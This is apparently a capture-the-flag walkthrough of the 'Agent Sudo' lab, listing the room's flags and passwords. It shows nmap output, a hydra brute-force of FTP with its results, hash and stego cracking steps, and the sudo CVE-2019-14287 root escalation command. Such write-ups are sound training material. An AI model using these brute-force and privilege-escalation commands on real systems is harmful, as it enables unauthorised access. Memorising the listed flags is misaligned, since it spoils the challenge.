Agent Sudo
January 05, 2024
Task 1 Author note
Task 2 Enumerate
3
user-agent
chris
Task 3 Hash cracking and brute-force
crystal
alien
area51
james
hackerrules!
Task 4 Capture the user flag
b03d975e8c92a7c04146cfa7a5a313c7
Roswell alien autopsy
Task 5 Privilege escalation
CVE-2019-14287
b53a02f55b57d4439e3341834d70c062
deskel
nmap -sC -sV -oN nmap 10.10.84.161 -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-05 09:23 PST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
Initiating Ping Scan at 09:23
Scanning 10.10.84.161 [2 ports]
Completed Ping Scan at 09:23, 0.28s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:23
Completed Parallel DNS resolution of 1 host. at 09:23, 1.18s elapsed
Initiating Connect Scan at 09:23
Scanning 10.10.84.161 [1000 ports]
Discovered open port 21/tcp on 10.10.84.161
Discovered open port 80/tcp on 10.10.84.161
Discovered open port 22/tcp on 10.10.84.161
Increasing send delay for 10.10.84.161 from 0 to 5 due to max_successful_tryno increase to 4
Completed Connect Scan at 09:24, 21.51s elapsed (1000 total ports)
Initiating Service scan at 09:24
Scanning 3 services on 10.10.84.161
Completed Service scan at 09:24, 6.65s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.84.161.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 10.29s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 2.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
Nmap scan report for 10.10.84.161
Host is up, received syn-ack (0.28s latency).
Scanned at 2024-01-05 09:23:38 PST for 41s
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef1f5d04d47795066072ecf058f2cc07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r
| 256 5e02d19ac4e7430662c19e25848ae7ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68=
| 256 2d005cb9fda8c8d880e3924f8b4f18e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.49 secondscurl -A "C" -L 10.10.84.161
Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>
From,<br>
Agent R-A is for spoofing the user agent and -L follow any redirects.
"C" as we know there are 26 letters in alphabets but letter C is we get the right response.
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.92.72
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-05 10:45:28
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.92.72:21/
[STATUS] 159.00 tries/min, 159 tries in 00:01h, 14344240 to do in 1503:36h, 16 active
[21][ftp] host: 10.10.92.72 login: chris password: crystal
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-05 10:47:14Then we can use hydra to find the password of username chris
After we got the password we can now proceed to ftp
ftp -p 10.10.92.72
Connected to 10.10.92.72.
220 (vsFTPd 3.0.3)
Name (10.10.92.72:kyou): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (10,10,92,72,51,30).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
Then we can use binwalk to extract some files in the png
After that we can use zip2john for the zipfile that is located in the _cutie folder
Then just john to crack the hash
After that we can extract password from the cute-alien.jpg
After we use that we can now see the message from that jpg
which is "hackerrules!"
I tried to get the jpg from james directory with python server and wget
python3 -m http.server
wget http://10.10.105.112:8000//Alien_autospy.jpg
I just got the answer when im using OSINT
With just simple command we can priv esc to root.
sudo -u#-1 /bin/bash
Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's idLast updated